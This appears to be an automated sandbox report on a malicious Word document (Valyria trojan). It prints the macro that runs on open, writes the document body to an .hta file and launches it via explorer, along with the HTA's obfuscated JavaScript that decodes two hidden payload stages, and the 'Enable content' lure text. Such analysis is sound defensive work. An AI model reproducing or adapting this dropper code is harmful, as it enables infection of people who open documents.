Dynamic Analysis Report
Created on 2021-11-12T21:19:00
Sample: instruct_11.21.doc.vir.doc (Word Document)
Classification: Malicious
Threat Names: Mal/Generic-S, Mal/HTMLGen-A, VB:Trojan.Valyria.5645
Remarks
(0x0200004A): 192 dumps were skipped because they exceeded the maximum dump size of 16 MB. The largest one was 19 MB.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
File Name | Category | Type | Verdict
---|---|---|---
C:\Users\RDhJ0CNFevzX\Desktop\instruct_11.21.doc.vir.doc | Sample File | Word Document | malicious
File Reputation Information
Verdict | malicious

AV Matches (2)
Threat Name | Verdict
---|---
VB:Trojan.Valyria.5645 | malicious
VB:Trojan.Valyria.5645 | malicious
Office Information
Property | Value
---|---
Keywords | ath.txeNwoPwop\cilbup\sresu\:c (the macro below reverses this string with StrReverse, which yields the drop path c:\users\public\powPowNext.hta)
Creator | ozdgjmh
Last Modified By | Пользователь Windows
Revision | 2
Create Time | 2021-11-10 09:34:00+00:00
Modify Time | 2021-11-10 09:34:00+00:00
Application | Microsoft Office Word
App Version | 16.0000
Template | Normal
Document Security | NONE
Page Count | 1
Line Count | 42
Paragraph Count | 1
Word Count | 116
Character Count | 9917
Chars With Spaces | 10032
ScaleCrop | (empty)
SharedDoc | (empty)
VBA Macros (2)

Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Function keywords()
    ' Reads the reversed drop path stored in the document's Keywords property.
    With ActiveDocument
        girlKarolGirl = .BuiltInDocumentProperties("keywords").Value
    End With
    keywords = StrReverse(girlKarolGirl)
    ' dowKarolYou is never assigned, so every "$1" marker in the document body
    ' is replaced with an empty string, reconstructing the hidden HTML/HTA text.
    ActiveDocument.Content.Find.Execute FindText:="$1", ReplaceWith:=dowKarolYou, Replace:=wdReplaceAll
End Function

Public Function s(dowGirlLoad)
    ' Launches the dropped file via explorer.exe, so the parent of the HTA host is explorer rather than WINWORD.
    Set dowYouKarol = CreateObject("wscript.shell")
    dowYouKarol.exec "c:\windows\explorer " & dowGirlLoad
End Function

Sub document_open()
    ' Auto-executes when the document is opened and macros are enabled.
    main.karoline ("")
End Sub

Macro #2: main
Attribute VB_Name = "main"

Public Sub karoline(likeTubeLike)
    doorLikeDow = ThisDocument.keywords
    ' Saves the de-obfuscated document body as plain text (FileFormat 2 = wdFormatText)
    ' to the .hta path, then runs it.
    With ActiveDocument
        .SaveAs2 FileName:=doorLikeDow, FileFormat:=2
    End With
    ThisDocument.s doorLikeDow
End Sub
Document Content Snippet
Extracted Image Texts (1)

Image 1: image1.gif
This document created in previous version of Microsoft Office Word
To view or edit this document, please click “Enable editing” button
on the top bar, and then click “Enable content”
File Name | Category | Type | Verdict
---|---|---|---
vbaProject.bin | Embedded File | Unknown | malicious

File Reputation Information
Verdict | malicious
Names | Mal/Generic-S

AV Matches (1)
Threat Name | Verdict
---|---
VB:Trojan.Valyria.5645 | malicious
File Name | Category | Type | Verdict
---|---|---|---
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat | Modified File | Stream | clean
Extracted JavaScripts (4)

JavaScript #1
function likeTubeDoor(loveDowPow) { return (new ActiveXObject(loveDowPow)); }
function loadLoveLove(girlNextPow) { return (loadDowDow.getElementById(girlNextPow).innerHTML); }
function tubeNextPow(likeLoadNext) { return ('cha' + likeLoadNext); }
// Base64 decoder whose alphabet is read from the hidden element 'karolPowYou'
// (a custom alphabet defeats naive base64 extraction).
function dowYouLike(doorLoadDoor) {
    var girlTubePow = loadLoveLove('karolPowYou');
    var likeDoorDoor = "";
    var youPowLoad, tubeGirlTube, girlLoadGirl;
    var karolKarolLoad, doorLikeKarol, dowDoorLove, nextNextYou;
    var youDoorKarol = 0;
    doorLoadDoor = doorLoadDoor.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    while (youDoorKarol < doorLoadDoor.length) {
        karolKarolLoad = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));
        doorLikeKarol = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));
        dowDoorLove = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));
        nextNextYou = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));
        youPowLoad = (karolKarolLoad << 2) | (doorLikeKarol >> 4);
        tubeGirlTube = ((doorLikeKarol & 15) << 4) | (dowDoorLove >> 2);
        girlLoadGirl = ((dowDoorLove & 3) << 6) | nextNextYou;
        likeDoorDoor = likeDoorDoor + String.fromCharCode(youPowLoad);
        if (dowDoorLove != 64) { likeDoorDoor = likeDoorDoor + String.fromCharCode(tubeGirlTube); }
        if (nextNextYou != 64) { likeDoorDoor = likeDoorDoor + String.fromCharCode(girlLoadGirl); }
    }
    return (likeDoorDoor);
}
function karolLoadNext(tubeTubeLove) { return tubeTubeLove.split('').reverse().join(''); }
// Reverse, base64-decode with the custom alphabet, reverse again.
function loveNextKarol(likeLoadNext) { return (karolLoadNext(dowYouLike(karolLoadNext(likeLoadNext)))); }
function karolNextDoor(likeLoadNext, nextNextLike) { return (likeLoadNext.split(nextNextLike)); }
doorPowLove = window;
loadDowDow = document;
// Moves the HTA window off-screen so the user sees nothing.
doorPowLove.moveTo(-10, -10);
// Two encoded payload stages are stored in element 'karolLikeDow', separated by "|||".
var tubeNextDow = loadLoveLove('karolLikeDow').split("|||");
var tubeNextDoor = loveNextKarol(tubeNextDow[0]);
var likeGirlTube = loveNextKarol(tubeNextDow[1]);

JavaScript #2
// Calls a window method whose name is stored reversed in element 'youGirlYou',
// passing the decoded stage as its argument.
function tubeYouDow(tubeLoadLove) { doorPowLove[karolLoadNext(loadLoveLove('youGirlYou'))](tubeLoadLove); }

JavaScript #3
Call tubeYouDow(tubeNextDoor) : Call tubeYouDow(likeGirlTube)

JavaScript #4
doorPowLove['close']();
File Name | Category | Type | Verdict
---|---|---|---
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT | Dropped File | Unknown | clean (known to be clean)

File Name | Category | Type | Verdict
---|---|---|---
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\YPFIZL51\error[1] | Dropped File | HTML | clean (known to be clean)

Extracted JavaScripts (1)

JavaScript #1
var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";
var L_ErrorNumber_Text = "Error: ";
var L_ContinueScript_Message = "Do you want to debug the current page?";
var L_AffirmativeKeyCodeLowerCase_Number = 121;
var L_AffirmativeKeyCodeUpperCase_Number = 89;
var L_NegativeKeyCodeLowerCase_Number = 110;
var L_NegativeKeyCodeUpperCase_Number = 78;

File Name | Category | Type | Verdict
---|---|---|---
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\0GQKFXIA\error[1] | Dropped File | Text | clean (known to be clean)

File Name | Category | Type | Verdict
---|---|---|---
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\VD7IA8JG\warning[1] | Dropped File | Image | clean